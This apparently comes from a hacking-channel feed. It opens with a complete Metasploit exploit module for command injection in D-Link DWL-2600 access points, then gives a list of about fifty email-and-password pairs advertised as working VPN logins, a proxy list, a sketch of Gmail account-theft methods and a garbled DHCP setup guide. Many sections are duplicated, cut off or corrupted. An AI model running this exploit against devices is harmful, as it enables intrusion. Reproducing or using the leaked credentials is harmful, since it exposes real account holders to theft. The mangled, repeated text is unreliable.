β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ TESTED BY UNDERCODE 2020 BUG
D-LINK 2020 Authenticated Remote Command Injection
t.me/undercodeTesting
This module requires Metasploit: https://metasploit.com/download
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'DLINK DWL-2600 Authenticated Remote Command Injection',
'Description' => %q{
Some DLINK Access Points are vulnerable to an authenticated OS command injection.
Default credentials for the web interface are admin/admin.
},
'Author' =>
[
'RAKI BEN HAMOUDA', # Vulnerability discovery and original research
'Nick Starke' # Metasploit Module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2019-20499' ],
[ 'EDB', '46841' ]
],
'DisclosureDate' => 'May 15 2019',
'Privileged' => true,
'Platform' => %w{ linux unix },
'Payload' =>
{
'DisableNops' => true,
'BadChars' => "\x00"
},
'CmdStagerFlavor' => :wget,
'Targets' =>
[
[ 'CMD',
{
'Arch' => ARCH_CMD,
'Platform' => 'unix'
}
],
[ 'Linux mips Payload',
{
'Arch' => ARCH_MIPSLE,
'Platform' => 'linux'
}
],
],
'DefaultTarget' => 1
))
register_options(
[
OptString.new('HttpUsername', [ true, 'The username to authenticate as', 'admin' ]),
OptString.new('HttpPassword', [ true, 'The password for the specified username', 'admin' ]),
OptString.new('TARGETURI', [ true, 'Base path to the Dlink web interface', '/' ])
])
end
def execute_command(cmd, opts={})
bogus = Rex::Text.rand_text_alpha(rand(10))
post_data = Rex::MIME::Message.new
post_data.add_part("up", nil, nil, "form-data; name=\"optprotocol\"")
post_data.add_part(bogus, nil, nil, "form-data; name=\"configRestore\"")
post_data.add_part("; #{cmd} ;", nil, nil, "form-data; name=\"configServerip\"")
print_status("Sending CGI payload using token: #{@token}") # Note token is an instance variable now
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'admin.cgi'),
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
'cookie' => "sessionHTTP=#{@token};",
'data' => post_data.to_s,
'query' => 'action=config_restore'
})
unless res || res.code != 200
fail_with(Failure::UnexpectedReply, "Command wasn't executed, aborting!")
end
rescue ::Rex::ConnectionError
vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")
return
end
def exploit
user = datastore['HttpUsername']
pass = datastore['HttpPassword']
rhost = datastore['RHOST']
rport = datastore['RPORT']
print_status("#{rhost}:#{rport} - Trying to login with #{user} / #{pass}")
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, '/admin.cgi'),
'method' => 'POST',
'vars_post' => {
'i_username' => user,
'i_password' => pass,
'login' => 'Logon'
}
})
unless res && res.code != 404
fail_with(Failure::NoAccess, "#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}")
end
unless [200, 301, 302].include?(res.code)
fail_with(Failure::NoAccess, "#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}")
end
print_good("#{rhost}:#{rport} - Successful login #{user}/#{pass}")
delstart = 'var cookieValue = "'
tokenoffset = res.body.index(delstart) + delstart.size
endoffset = res.body.index('";', tokenoffset)
@token = res.body[tokenoffset, endoffset - tokenoffset]
if @token.empty?
π¦ TESTED BY UNDERCODE 2020 BUG
D-LINK 2020 Authenticated Remote Command Injection
t.me/undercodeTesting
This module requires Metasploit: https://metasploit.com/download
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'DLINK DWL-2600 Authenticated Remote Command Injection',
'Description' => %q{
Some DLINK Access Points are vulnerable to an authenticated OS command injection.
Default credentials for the web interface are admin/admin.
},
'Author' =>
[
'RAKI BEN HAMOUDA', # Vulnerability discovery and original research
'Nick Starke' # Metasploit Module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2019-20499' ],
[ 'EDB', '46841' ]
],
'DisclosureDate' => 'May 15 2019',
'Privileged' => true,
'Platform' => %w{ linux unix },
'Payload' =>
{
'DisableNops' => true,
'BadChars' => "\x00"
},
'CmdStagerFlavor' => :wget,
'Targets' =>
[
[ 'CMD',
{
'Arch' => ARCH_CMD,
'Platform' => 'unix'
}
],
[ 'Linux mips Payload',
{
'Arch' => ARCH_MIPSLE,
'Platform' => 'linux'
}
],
],
'DefaultTarget' => 1
))
register_options(
[
OptString.new('HttpUsername', [ true, 'The username to authenticate as', 'admin' ]),
OptString.new('HttpPassword', [ true, 'The password for the specified username', 'admin' ]),
OptString.new('TARGETURI', [ true, 'Base path to the Dlink web interface', '/' ])
])
end
def execute_command(cmd, opts={})
bogus = Rex::Text.rand_text_alpha(rand(10))
post_data = Rex::MIME::Message.new
post_data.add_part("up", nil, nil, "form-data; name=\"optprotocol\"")
post_data.add_part(bogus, nil, nil, "form-data; name=\"configRestore\"")
post_data.add_part("; #{cmd} ;", nil, nil, "form-data; name=\"configServerip\"")
print_status("Sending CGI payload using token: #{@token}") # Note token is an instance variable now
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'admin.cgi'),
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
'cookie' => "sessionHTTP=#{@token};",
'data' => post_data.to_s,
'query' => 'action=config_restore'
})
unless res || res.code != 200
fail_with(Failure::UnexpectedReply, "Command wasn't executed, aborting!")
end
rescue ::Rex::ConnectionError
vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")
return
end
def exploit
user = datastore['HttpUsername']
pass = datastore['HttpPassword']
rhost = datastore['RHOST']
rport = datastore['RPORT']
print_status("#{rhost}:#{rport} - Trying to login with #{user} / #{pass}")
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, '/admin.cgi'),
'method' => 'POST',
'vars_post' => {
'i_username' => user,
'i_password' => pass,
'login' => 'Logon'
}
})
unless res && res.code != 404
fail_with(Failure::NoAccess, "#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}")
end
unless [200, 301, 302].include?(res.code)
fail_with(Failure::NoAccess, "#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}")
end
print_good("#{rhost}:#{rport} - Successful login #{user}/#{pass}")
delstart = 'var cookieValue = "'
tokenoffset = res.body.index(delstart) + delstart.size
endoffset = res.body.index('";', tokenoffset)
@token = res.body[tokenoffset, endoffset - tokenoffset]
if @token.empty?
print_good("#{peer} - Received Auth token: #{@token}")
if target.name =~ /CMD/
unless datastore['CMD']
end
fail_with(Failure::BadConfig, "#{rhost}:#{rport} - Only the cmd/generic payload is compatible")
end
execute_command(payload.encoded)
else
execute_cmdstager(linemax: 100, noconcat: true)
end
end
end
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
if target.name =~ /CMD/
unless datastore['CMD']
end
fail_with(Failure::BadConfig, "#{rhost}:#{rport} - Only the cmd/generic payload is compatible")
end
execute_command(payload.encoded)
else
execute_cmdstager(linemax: 100, noconcat: true)
end
end
end
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ NEW 50 WORKING NORDVPN-TESTED @UNDERCODETESTING
zayzay451@gmail.com:Madman123
mrmcby@gmail.com:Marshall5599
km.skazka@gmail.com:shust0517
fabslayer@hotmail.com:arena007
jmorris835@hotmail.com:15Feb1944
stevechambers15t@gmail.com:station1
tripp.welge@gmail.com:thurlow84
fgrodkowski2003@gmail.com:Filip2003
jorge.vega.herrera@gmail.com:Gazelem1804
coltongdudley@gmail.com:facebook5
tqco@netzero.net:richest3
willrocks012@gmail.com:Azsxdc12
thealockett@yandex.com:Welcome1
manhtungvu@gmail.com:J3shockg4
darrenldl@hotmail.com:darren10
mailbothra@gmail.com:n123456b
robwilliamsffc@yahoo.co.uk:Fulhamfc1
dcichocki27@hotmail.com:Billyboy12
issah@me.com:mouslim1
supremewildmonkey@gmail.com:Gameflow1
great.dispair@gmail.com:Greatdespair4110
jerome_sollberger@hotmail.com:paheseair1991
alinyear2002@hotmail.com:bd050111
travismcneill@ymail.com:Tarheels23
pace987@yahoo.com:Frogger01
julien.rom98@gmail.com:Julien1998
ordenmuslig@outlook.de:Ordeni31
imransyedbbm@gmail.com:syed28091978
seth.ritter2@gmail.com:CVFootball63
kevhan9@yahoo.com:kel9star
caleb.bryce.scott@gmail.com:Kickflip1
farhood_nomad1985@yahoo.com:squasher
theblazian@gmail.com:doreena21
bluerpk@gmail.com:blue0000ff
ddiaz01@yahoo.com:daviddiaz2011
josef.bremberger@googlemail.com:Avalanche123
mdanford21@outlook.com:Saints2010
daymoon83@hotmail.fr:Carvalho83500
ayasofia89@gmail.com:calin2404
hewson72@hotmail.com:02Camaro
salt33447@gmail.com:Challenger2015
lorenlsimpson@gmail.com:Starwars10
ddrabick@yahoo.com:Helloduhh10
benji512512@gmail.com:Brady5126
ajoker1895@hotmail.com:Theamity1895
arazukie@gmail.com:Poopface12
haroonaltaf@hotmail.com:Haytch123
melaniewalk@gmail.com:dagmar0408
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ NEW 50 WORKING NORDVPN-TESTED @UNDERCODETESTING
zayzay451@gmail.com:Madman123
mrmcby@gmail.com:Marshall5599
km.skazka@gmail.com:shust0517
fabslayer@hotmail.com:arena007
jmorris835@hotmail.com:15Feb1944
stevechambers15t@gmail.com:station1
tripp.welge@gmail.com:thurlow84
fgrodkowski2003@gmail.com:Filip2003
jorge.vega.herrera@gmail.com:Gazelem1804
coltongdudley@gmail.com:facebook5
tqco@netzero.net:richest3
willrocks012@gmail.com:Azsxdc12
thealockett@yandex.com:Welcome1
manhtungvu@gmail.com:J3shockg4
darrenldl@hotmail.com:darren10
mailbothra@gmail.com:n123456b
robwilliamsffc@yahoo.co.uk:Fulhamfc1
dcichocki27@hotmail.com:Billyboy12
issah@me.com:mouslim1
supremewildmonkey@gmail.com:Gameflow1
great.dispair@gmail.com:Greatdespair4110
jerome_sollberger@hotmail.com:paheseair1991
alinyear2002@hotmail.com:bd050111
travismcneill@ymail.com:Tarheels23
pace987@yahoo.com:Frogger01
julien.rom98@gmail.com:Julien1998
ordenmuslig@outlook.de:Ordeni31
imransyedbbm@gmail.com:syed28091978
seth.ritter2@gmail.com:CVFootball63
kevhan9@yahoo.com:kel9star
caleb.bryce.scott@gmail.com:Kickflip1
farhood_nomad1985@yahoo.com:squasher
theblazian@gmail.com:doreena21
bluerpk@gmail.com:blue0000ff
ddiaz01@yahoo.com:daviddiaz2011
josef.bremberger@googlemail.com:Avalanche123
mdanford21@outlook.com:Saints2010
daymoon83@hotmail.fr:Carvalho83500
ayasofia89@gmail.com:calin2404
hewson72@hotmail.com:02Camaro
salt33447@gmail.com:Challenger2015
lorenlsimpson@gmail.com:Starwars10
ddrabick@yahoo.com:Helloduhh10
benji512512@gmail.com:Brady5126
ajoker1895@hotmail.com:Theamity1895
arazukie@gmail.com:Poopface12
haroonaltaf@hotmail.com:Haytch123
melaniewalk@gmail.com:dagmar0408
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦TODAY PROXIES PREMIUM LIST :
t.me/undercodeTesting
π¦ IP Address Port Code Country Anonymity Google Https Last Checked
144.76.214.154 1080 DE Germany elite proxy no yes 3 seconds ago
144.76.214.155 1080 DE Germany elite proxy no yes 20 minutes ago
144.76.214.156 1080 DE Germany elite proxy no yes 20 minutes ago
103.220.207.242 32227 BD Bangladesh elite proxy no yes 20 minutes ago
103.221.254.102 49614 BD Bangladesh elite proxy no yes 20 minutes ago
103.57.71.137 33458 IN India elite proxy no yes 11 minutes ago
103.78.80.194 33442 ID Indonesia elite proxy no yes 11 minutes ago
103.81.104.66 46641 BD Bangladesh elite proxy no yes 20 minutes ago
104.248.158.243 44344 SG Singapore elite proxy no yes 11 minutes ago
109.248.62.207 43558 CZ Czech Republic elite proxy no yes 11 minutes
ago
117.102.73.44 8182 ID Indonesia elite proxy no yes 11 minutes ago
118.172.201.105 50782 TH Thailand elite proxy no yes 11 minutes ago
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦TODAY PROXIES PREMIUM LIST :
t.me/undercodeTesting
π¦ IP Address Port Code Country Anonymity Google Https Last Checked
144.76.214.154 1080 DE Germany elite proxy no yes 3 seconds ago
144.76.214.155 1080 DE Germany elite proxy no yes 20 minutes ago
144.76.214.156 1080 DE Germany elite proxy no yes 20 minutes ago
103.220.207.242 32227 BD Bangladesh elite proxy no yes 20 minutes ago
103.221.254.102 49614 BD Bangladesh elite proxy no yes 20 minutes ago
103.57.71.137 33458 IN India elite proxy no yes 11 minutes ago
103.78.80.194 33442 ID Indonesia elite proxy no yes 11 minutes ago
103.81.104.66 46641 BD Bangladesh elite proxy no yes 20 minutes ago
104.248.158.243 44344 SG Singapore elite proxy no yes 11 minutes ago
109.248.62.207 43558 CZ Czech Republic elite proxy no yes 11 minutes
ago
117.102.73.44 8182 ID Indonesia elite proxy no yes 11 minutes ago
118.172.201.105 50782 TH Thailand elite proxy no yes 11 minutes ago
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦MOST ACTIVE GMAIL HACKING IN LAST 7 DAYS
instagram.com/undercodeTesting
π¦ ππΌππ πππΈβπ :
1) Phishing
This is a technology widely used by people to secretly crack Gmail passwords. The fishing process does not require any special technical knowledge and skills. Its main working principle is to copy the original login page of Gmail and steal the user's password. If the user has no experience with the computer, he or she will not notice that the page looks suspicious. This is why they may type a password to log in to Gmail that is automatically transmitted to the hacker. This way he / she will receive a valid password to log in to Gmail and read all required emails.
2) Plain Grabbing
It is used to steal the victim's password. The attacker needs to crack the specific website where the target victim is a member and steal his username and password from the website's database. People often use the same secret vocabulary on many websites. Therefore, the attacker is likely to log into the victim's Gmail and read the email secretly.
3) Browser extension Gmail Hacker
With this method, attackers will not steal your password, but they can indirectly access and control your computer. People can install various additional components upon request. The hacker created a fake plug-in and waited for the victims to fix it, giving them easy access to their email. If a person is not an experienced PC user, he or she will not suspect that the plug-in is fake. This is why it is important not to install any programs from sources you do not trust.
4) Trojan horse
Trojan horses can monitor the victims' computers and control their activities in Gmail. They also record all content of the victim type and display all information so that the attacker can read all logs. Trojan horse program is a program that can be easily hidden in any software (such as media files). Victims can obtain Trojan horses by email or download them on the Internet.
Written by Undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦MOST ACTIVE GMAIL HACKING IN LAST 7 DAYS
instagram.com/undercodeTesting
π¦ ππΌππ πππΈβπ :
1) Phishing
This is a technology widely used by people to secretly crack Gmail passwords. The fishing process does not require any special technical knowledge and skills. Its main working principle is to copy the original login page of Gmail and steal the user's password. If the user has no experience with the computer, he or she will not notice that the page looks suspicious. This is why they may type a password to log in to Gmail that is automatically transmitted to the hacker. This way he / she will receive a valid password to log in to Gmail and read all required emails.
2) Plain Grabbing
It is used to steal the victim's password. The attacker needs to crack the specific website where the target victim is a member and steal his username and password from the website's database. People often use the same secret vocabulary on many websites. Therefore, the attacker is likely to log into the victim's Gmail and read the email secretly.
3) Browser extension Gmail Hacker
With this method, attackers will not steal your password, but they can indirectly access and control your computer. People can install various additional components upon request. The hacker created a fake plug-in and waited for the victims to fix it, giving them easy access to their email. If a person is not an experienced PC user, he or she will not suspect that the plug-in is fake. This is why it is important not to install any programs from sources you do not trust.
4) Trojan horse
Trojan horses can monitor the victims' computers and control their activities in Gmail. They also record all content of the victim type and display all information so that the attacker can read all logs. Trojan horse program is a program that can be easily hidden in any software (such as media files). Victims can obtain Trojan horses by email or download them on the Internet.
Written by Undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Set up Your DHCP Server as A hacking
> Full by Undercode :
t.me/UndercodeTesting
π¦ ππΌππ πππΈβπ :
1) Erection DHCP Server
DHCP is the abbreviation of Dynamic Host Configuration Protocol, mainly used to simplify network management in: The problem of "trouble" in workstation / host network configuration settings, commonly known as: "" dynamic allocation of IP "".
2) Compared with the dynamic allocation mechanism, it uses manual and manual methods to set one by one , Is called static setting.
> Static setting is quite inefficient.
π¦Imagine: If there are hundreds of workstations in a network segment, manually set it manually, it is not strange to be tired, and, in the future, if you want to change The network configuration is also extremely inconvenient!
1) Therefore, in the network management work, DHCP Server is a very important erection service. In the
2) past, most of the school βs DHCP Servers were installed on NT / W2K, but the performance and The stability is not very good,
3) therefore, the following introduces the installation of DHCP Server on RedHat Linux.
π¦ ππΌππ πππΈβπ :
Required packages:
dhcp-2.0-5.i386.rpm (RedHat 6.2)
dhcp-2.0-12.i186.rpm (RedHat 7.0)
dhcp-2.0-12.i386.rpm (CLE 1.0)
dhcp-2.0p15-4.i386.rpm ( RedHat 7.1)
2) Please choose the dhcp Server package according to your Linux version.
3) Setting up:
π¦ On RedHat Linux, setting up a DHCP Server is very simple!
1) Installation:
(a) rpm -ivh dhcp-2.0-5.i386. After rpm
(b), check, what files are installed in the host?
rpm -ql dhcp | more
2) will get the following list:
/etc/rc.d/init.d/dhcpd
/ usr / doc / dhcp- 2.0
/usr/doc/dhcp-2.0/CHANGES
/usr/doc/dhcp-2.0/README
/usr/doc/dhcp-2.0/RELNOTES
/usr/doc/dhcp-2.0/dhcpd.conf.sample
/ usr / man / man5 / dhcp-options.5.gz
/usr/man/man5/dhcpd.conf.5.gz
/usr/man/man5/dhcpd.leases.5.gz
/usr/man/man8/dhcpd.8.gz
/usr/man/man8/dhcrelay.8.gz
/ usr / sbin / dhcpd
/ usr / sbin / dhcrelay
/ var / state / dhcp
, of which two are more important :
3) One is, /etc/rc.d/init.d/dhcpd, which can be used to control the behavior of the dhcp server, such as:
start: /etc/rc.d/init.d/dhcpd start
stop: / etc / rc .d / init.d / dhcpd stop
restart: /etc/rc.d/init.d/dhcpd restart
4) Observe the operation status: /etc/rc.d/init.d/dhcpd status The
other is, / usr / doc /dhcp-2.0/dhcpd.conf.sample
(RedHat 7.0 in /usr/share/doc/dhcp-2.0)
5) As the name implies, this is a configuration file of the dhcp server, wait a minute, we will copy it to / etc , And named dhcpd.conf.
(C) cp /usr/doc/dhcp-2.0/dhcpd.conf.sample /etc/dhcpd.conf
π¦ Set up Your DHCP Server as A hacking
> Full by Undercode :
t.me/UndercodeTesting
π¦ ππΌππ πππΈβπ :
1) Erection DHCP Server
DHCP is the abbreviation of Dynamic Host Configuration Protocol, mainly used to simplify network management in: The problem of "trouble" in workstation / host network configuration settings, commonly known as: "" dynamic allocation of IP "".
2) Compared with the dynamic allocation mechanism, it uses manual and manual methods to set one by one , Is called static setting.
> Static setting is quite inefficient.
π¦Imagine: If there are hundreds of workstations in a network segment, manually set it manually, it is not strange to be tired, and, in the future, if you want to change The network configuration is also extremely inconvenient!
1) Therefore, in the network management work, DHCP Server is a very important erection service. In the
2) past, most of the school βs DHCP Servers were installed on NT / W2K, but the performance and The stability is not very good,
3) therefore, the following introduces the installation of DHCP Server on RedHat Linux.
π¦ ππΌππ πππΈβπ :
Required packages:
dhcp-2.0-5.i386.rpm (RedHat 6.2)
dhcp-2.0-12.i186.rpm (RedHat 7.0)
dhcp-2.0-12.i386.rpm (CLE 1.0)
dhcp-2.0p15-4.i386.rpm ( RedHat 7.1)
2) Please choose the dhcp Server package according to your Linux version.
3) Setting up:
π¦ On RedHat Linux, setting up a DHCP Server is very simple!
1) Installation:
(a) rpm -ivh dhcp-2.0-5.i386. After rpm
(b), check, what files are installed in the host?
rpm -ql dhcp | more
2) will get the following list:
/etc/rc.d/init.d/dhcpd
/ usr / doc / dhcp- 2.0
/usr/doc/dhcp-2.0/CHANGES
/usr/doc/dhcp-2.0/README
/usr/doc/dhcp-2.0/RELNOTES
/usr/doc/dhcp-2.0/dhcpd.conf.sample
/ usr / man / man5 / dhcp-options.5.gz
/usr/man/man5/dhcpd.conf.5.gz
/usr/man/man5/dhcpd.leases.5.gz
/usr/man/man8/dhcpd.8.gz
/usr/man/man8/dhcrelay.8.gz
/ usr / sbin / dhcpd
/ usr / sbin / dhcrelay
/ var / state / dhcp
, of which two are more important :
3) One is, /etc/rc.d/init.d/dhcpd, which can be used to control the behavior of the dhcp server, such as:
start: /etc/rc.d/init.d/dhcpd start
stop: / etc / rc .d / init.d / dhcpd stop
restart: /etc/rc.d/init.d/dhcpd restart
4) Observe the operation status: /etc/rc.d/init.d/dhcpd status The
other is, / usr / doc /dhcp-2.0/dhcpd.conf.sample
(RedHat 7.0 in /usr/share/doc/dhcp-2.0)
5) As the name implies, this is a configuration file of the dhcp server, wait a minute, we will copy it to / etc , And named dhcpd.conf.
(C) cp /usr/doc/dhcp-2.0/dhcpd.conf.sample /etc/dhcpd.conf
Configuration:
Then, you can start the configuration file for dhcp server / etc / dhcpd.conf to do the setting work. The
following is the original content of the file:
subnet 192.168.0.0 netmask 255.255.255.0 {
# --- default gateway
option routers 192.168.0.1;
option subnet-mask 255.255.255.0;
option nis-domain ""domain.org"";
option domain-name ""domain.org"";
option domain-name-servers 192.168.1.1;
option time-offset -5; # Eastern Standard Time
# option ntp-servers 192.168.1.1;
# option netbios-name-servers 192.168.1.1;
# --- Selects point-to-point node (default is hybrid). Don''t change this unless
# -- you understand Netbios very well
# option netbios-node-type 2;
range dynamic-bootp 192.168.0.128 192.168.0.255;
default-lease-time 21600;
max-lease-time 43200;
# we want the nameserver to appear at a fixed address
host ns {
next-server marvin.redhat.com;
hardware ethernet 12: 34: 56: 78: AB: CD;
fixed-address 207.175.42.254;
}
}
>part 2 Set up Your DHCP Server as A hacking
1) Junior High School as an example, the school is the first half of 1/2 C) subnet 163.26.167.0 netmask 255.255.255.128 {
# --- default gateway
# router IP
option routers 163.26.197.126;
2) network mask
option subnet -mask 255.255.255.128;
3) Domain
option domain-name "" jmjh.tnc.edu.tw "";
# Specify which DNS servers to dispatch to provide services?
option domain-name-servers 163.26.167.1, 163.26.200.1 , 168.95.1.1;
4) option time-offset -5; # Eastern Standard Time
# Dynamic allocation of IP fence
5) range dynamic-bootp 163.26.167.50 163.26.167.100;
Then, you can start the configuration file for dhcp server / etc / dhcpd.conf to do the setting work. The
following is the original content of the file:
subnet 192.168.0.0 netmask 255.255.255.0 {
# --- default gateway
option routers 192.168.0.1;
option subnet-mask 255.255.255.0;
option nis-domain ""domain.org"";
option domain-name ""domain.org"";
option domain-name-servers 192.168.1.1;
option time-offset -5; # Eastern Standard Time
# option ntp-servers 192.168.1.1;
# option netbios-name-servers 192.168.1.1;
# --- Selects point-to-point node (default is hybrid). Don''t change this unless
# -- you understand Netbios very well
# option netbios-node-type 2;
range dynamic-bootp 192.168.0.128 192.168.0.255;
default-lease-time 21600;
max-lease-time 43200;
# we want the nameserver to appear at a fixed address
host ns {
next-server marvin.redhat.com;
hardware ethernet 12: 34: 56: 78: AB: CD;
fixed-address 207.175.42.254;
}
}
>part 2 Set up Your DHCP Server as A hacking
1) Junior High School as an example, the school is the first half of 1/2 C) subnet 163.26.167.0 netmask 255.255.255.128 {
# --- default gateway
# router IP
option routers 163.26.197.126;
2) network mask
option subnet -mask 255.255.255.128;
3) Domain
option domain-name "" jmjh.tnc.edu.tw "";
# Specify which DNS servers to dispatch to provide services?
option domain-name-servers 163.26.167.1, 163.26.200.1 , 168.95.1.1;
4) option time-offset -5; # Eastern Standard Time
# Dynamic allocation of IP fence
5) range dynamic-bootp 163.26.167.50 163.26.167.100;
> setup dhcp as hacking lab :
π¦ IP lease time
default-lease-time 21600;
max-lease-time 43200;
π¦ Set your school βs DNS host to a fixed IP
1) we want the nameserver to appear at a fixed address
host ns {
next-server dns.jmjh.tnc.edu.tw;
hardware ethernet 12: 34: 56: 78: AB: CD;
fixed-address 163.26.167.1;
}
} In the
3) above settings, please follow The configuration of your school, modify it
by yourself . Note:
(a) host ns {
next-server dns.jmjh.tnc.edu.tw;
hardware ethernet 12: 34: 56: 78: AB: CD; --- > This is the number of the DNS host network card (6 bytes), please use ifconfig to query, as follows:
fixed-address 163.26.167.1;
}
4) ifconfig got:
eth0 Link encap: Ethernet HWaddr 48: 54: E8: 26: CC: C9
inet addr: 163.26.167.1 Bcast: 163.26.167.127 Mask: 255.255.255.128
5) UP BROADCAST RUNNING MULTICAST MTU: 1500 Metric: 1
RX packets: 762193 errors: 0 dropped: 0 overruns: 0 frame: 0
TX packets: 555401 errors: 0 dropped : 0 overruns: 0 carrier: 0
collisions: 0 txqueuelen: 100
Interrupt: 11 Base address: 0x8000
> take HWaddr 48: 54: E8: 26: CC: C9 48: 54: E8: 26: CC: C9 and
fill in the above hardware ethernet settings can be.
special Note:! your school ID card (each card the world's only) and this will not be the same as this, do not copy here of the set value yo
6) this may dhcp server Coexist with the original dhcp server on NT / W2K, but please note that the IP allocation segment should be staggered.
So, in the end, which dhcp server the workstation will get dynamic allocation?
7) Very simple, when the workstation sends a request (request ) Message, whoever grabs it first will provide it first.
π¦ Execution:
/etc/rc.d/init.d/dhcpd start
will not succeed the first time,
If it is dhcp-2.0-5 version, it will show a failed red string and warn you:
/var/state/dhcp/dhcpd.leases This file does not exist, so you must manually open a new file:
touch / var
8) The purpose of the /state/dhcp/dhcpd.leases file is to record the status of leased IP of each workstation.
If it is a version after DHCP-2.0-12, no message will appear, and you will find that it does not work.
9) This is Because: Once this version finds that you have not opened this file, it will jump out without running.
10) And the location of this file is slightly different:
it is located in /var/lib/dhcp/dhcpd.leases
OK, open it manually ?!
touch /var/lib/dhcp/dhcpd.leases
11) can now be started, and set it to run automatically upon booting (either linuxconf or ntsysv can be set)
/etc/rc.d/init.d/dhcpd start
Congratulations ! Your school already has a very stable DHCP server!
π¦ Note:
If you have a Linux firewall, you want to allocate the DHCP server from a certain network card (one network card represents a network segment),
for example: Zhang network card interface eth1 dispensed, as long as the modifications to /etc/rc.d/init.d/dhcpd.
follows:
the start daemons place
by the:
daemon / usr / sbin / dhcpd
changed to:
daemon / usr / sbin / dhcpd eth1
π¦ Conclusion:
DHCP Server is a very important tool in network management work. It is also wise to set up more than two backups.
And, from then on, you It is no longer necessary to rely on NT / W2K, a system with poor performance and instability (the price-to-earnings ratio is too low).
(It is not necessary to be restricted to a closed company, and do not have to spend a lot of money, it is the network of primary and secondary schools. Build, the best PE ratio choice!)
Written by Undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ IP lease time
default-lease-time 21600;
max-lease-time 43200;
π¦ Set your school βs DNS host to a fixed IP
1) we want the nameserver to appear at a fixed address
host ns {
next-server dns.jmjh.tnc.edu.tw;
hardware ethernet 12: 34: 56: 78: AB: CD;
fixed-address 163.26.167.1;
}
} In the
3) above settings, please follow The configuration of your school, modify it
by yourself . Note:
(a) host ns {
next-server dns.jmjh.tnc.edu.tw;
hardware ethernet 12: 34: 56: 78: AB: CD; --- > This is the number of the DNS host network card (6 bytes), please use ifconfig to query, as follows:
fixed-address 163.26.167.1;
}
4) ifconfig got:
eth0 Link encap: Ethernet HWaddr 48: 54: E8: 26: CC: C9
inet addr: 163.26.167.1 Bcast: 163.26.167.127 Mask: 255.255.255.128
5) UP BROADCAST RUNNING MULTICAST MTU: 1500 Metric: 1
RX packets: 762193 errors: 0 dropped: 0 overruns: 0 frame: 0
TX packets: 555401 errors: 0 dropped : 0 overruns: 0 carrier: 0
collisions: 0 txqueuelen: 100
Interrupt: 11 Base address: 0x8000
> take HWaddr 48: 54: E8: 26: CC: C9 48: 54: E8: 26: CC: C9 and
fill in the above hardware ethernet settings can be.
special Note:! your school ID card (each card the world's only) and this will not be the same as this, do not copy here of the set value yo
6) this may dhcp server Coexist with the original dhcp server on NT / W2K, but please note that the IP allocation segment should be staggered.
So, in the end, which dhcp server the workstation will get dynamic allocation?
7) Very simple, when the workstation sends a request (request ) Message, whoever grabs it first will provide it first.
π¦ Execution:
/etc/rc.d/init.d/dhcpd start
will not succeed the first time,
If it is dhcp-2.0-5 version, it will show a failed red string and warn you:
/var/state/dhcp/dhcpd.leases This file does not exist, so you must manually open a new file:
touch / var
8) The purpose of the /state/dhcp/dhcpd.leases file is to record the status of leased IP of each workstation.
If it is a version after DHCP-2.0-12, no message will appear, and you will find that it does not work.
9) This is Because: Once this version finds that you have not opened this file, it will jump out without running.
10) And the location of this file is slightly different:
it is located in /var/lib/dhcp/dhcpd.leases
OK, open it manually ?!
touch /var/lib/dhcp/dhcpd.leases
11) can now be started, and set it to run automatically upon booting (either linuxconf or ntsysv can be set)
/etc/rc.d/init.d/dhcpd start
Congratulations ! Your school already has a very stable DHCP server!
π¦ Note:
If you have a Linux firewall, you want to allocate the DHCP server from a certain network card (one network card represents a network segment),
for example: Zhang network card interface eth1 dispensed, as long as the modifications to /etc/rc.d/init.d/dhcpd.
follows:
the start daemons place
by the:
daemon / usr / sbin / dhcpd
changed to:
daemon / usr / sbin / dhcpd eth1
π¦ Conclusion:
DHCP Server is a very important tool in network management work. It is also wise to set up more than two backups.
And, from then on, you It is no longer necessary to rely on NT / W2K, a system with poor performance and instability (the price-to-earnings ratio is too low).
(It is not necessary to be restricted to a closed company, and do not have to spend a lot of money, it is the network of primary and secondary schools. Build, the best PE ratio choice!)
Written by Undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦CREATE YOUR OWN HOST FILE :
Interpretation of apache configuration file http.conf by Undercode :
fb.com/undercodeTesting
π¦ ππΌππ πππΈβπ :
1) interpretation apache configuration file http.conf
recently wanted to do with their own server machines, because I know enough about the contents of http.conf, as well as their own path detours. Now explain the meaning of several options that need to be modified frequently in this file,
